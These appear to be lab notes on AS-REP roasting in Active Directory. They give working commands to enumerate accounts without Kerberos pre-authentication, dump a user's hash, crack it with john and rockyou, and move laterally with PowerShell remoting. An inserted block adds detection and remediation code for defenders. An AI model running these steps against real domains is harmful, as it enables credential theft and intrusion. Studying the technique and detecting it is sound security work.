To do AS-REP roasting, the target account must have "Do not require Kerberos preauthentication" set on it.

If we have GenericWrite or GenericAll rights on a user object, we can set that flag ourselves (force-disable pre-auth) and then AS-REP roast the account.

enumerating accounts with Kerberos pre-auth disabled (PowerView):

Get-NetUser -PreauthNotRequired -Verbose


now let's filter the output down to the fields we care about

Get-NetUser -PreauthNotRequired -Verbose | select cn,samaccountname
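As an added example (not part of the original notes): the defender-side version of this enumeration, using the same userAccountControl bit (DONT_REQ_PREAUTH, 0x400000) that PowerView's -PreauthNotRequired filter checks, plus a query for the 4768 events that the hash-dumping step leaves on a domain controller. It assumes a domain-joined host; the function names are mine.

```powershell
# Added example, not from the original notes: audit the precondition for
# AS-REP roasting and look for it being exercised. Assumes a domain-joined host.
$DONT_REQ_PREAUTH = 0x400000   # userAccountControl flag "Do not require Kerberos preauthentication"

function Get-PreauthNotRequiredUser {
    # Same LDAP query PowerView's Get-NetUser -PreauthNotRequired runs; plain ADSI, no RSAT needed.
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule.
    $s = New-Object System.DirectoryServices.DirectorySearcher
    $s.Filter = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=$DONT_REQ_PREAUTH))"
    $s.PageSize = 1000
    [void]$s.PropertiesToLoad.AddRange([string[]]@('samaccountname','cn','useraccountcontrol','memberof','pwdlastset'))
    foreach ($r in $s.FindAll()) {
        $p = $r.Properties
        $uac = [int]$p['useraccountcontrol'][0]
        [pscustomobject]@{
            SamAccountName = $p['samaccountname'][0]
            CN             = $p['cn'][0]
            Enabled        = -not ($uac -band 0x2)   # ACCOUNTDISABLE; enabled accounts are the real exposure
            Groups         = $p['memberof'].Count    # privileged group membership raises the risk
            PwdLastSet     = [datetime]::FromFileTime([long]$p['pwdlastset'][0])
        }
    }
}

function Find-AsRepRequest {
    # Run on a domain controller: 4768 (TGT requested) with PreAuthType 0 (no pre-auth)
    # and an RC4 ticket (0x17) is the footprint a Get-ASREPHash run leaves in the Security log.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = @{}
            foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($d['PreAuthType'] -eq '0' -and $d['TicketEncryptionType'] -eq '0x17') {
                [pscustomobject]@{ Time = $_.TimeCreated; Account = $d['TargetUserName']; Source = $d['IpAddress'] }
            }
        }
}

# Remediation: clear the flag on every enabled account that carries it (needs the RSAT ActiveDirectory module).
# Get-PreauthNotRequiredUser | Where-Object Enabled | ForEach-Object {
#     Set-ADAccountControl -Identity $_.SamAccountName -DoesNotRequirePreAuth $false }
```

Run Get-PreauthNotRequiredUser from any domain-joined machine and Find-AsRepRequest on a DC; an account listed by the first and a burst of matching 4768 events from one source IP is the pattern to alert on.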


getting the hashes

we will get the hash of one user first; after that we can script the same steps for the others

. .\ASREPRoast.ps1   # dot-source the script so Get-ASREPHash is available in this session
Get-ASREPHash -UserName peria.elisa -Verbose


now let's try to crack it (the hash from the previous step saved in crackme.txt)

john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt


as we see, we cracked the password for the user peria.elisa

now, if you want to move laterally with these credentials, let's try PowerShell Remoting

Enable-PSRemoting   # run on the target host; local admin privs required
Enter-PSSession -ComputerName WIN-Q4788GPE9L7 -Credential (Get-Credential)   # parentheses needed so the prompt runs and its result is passed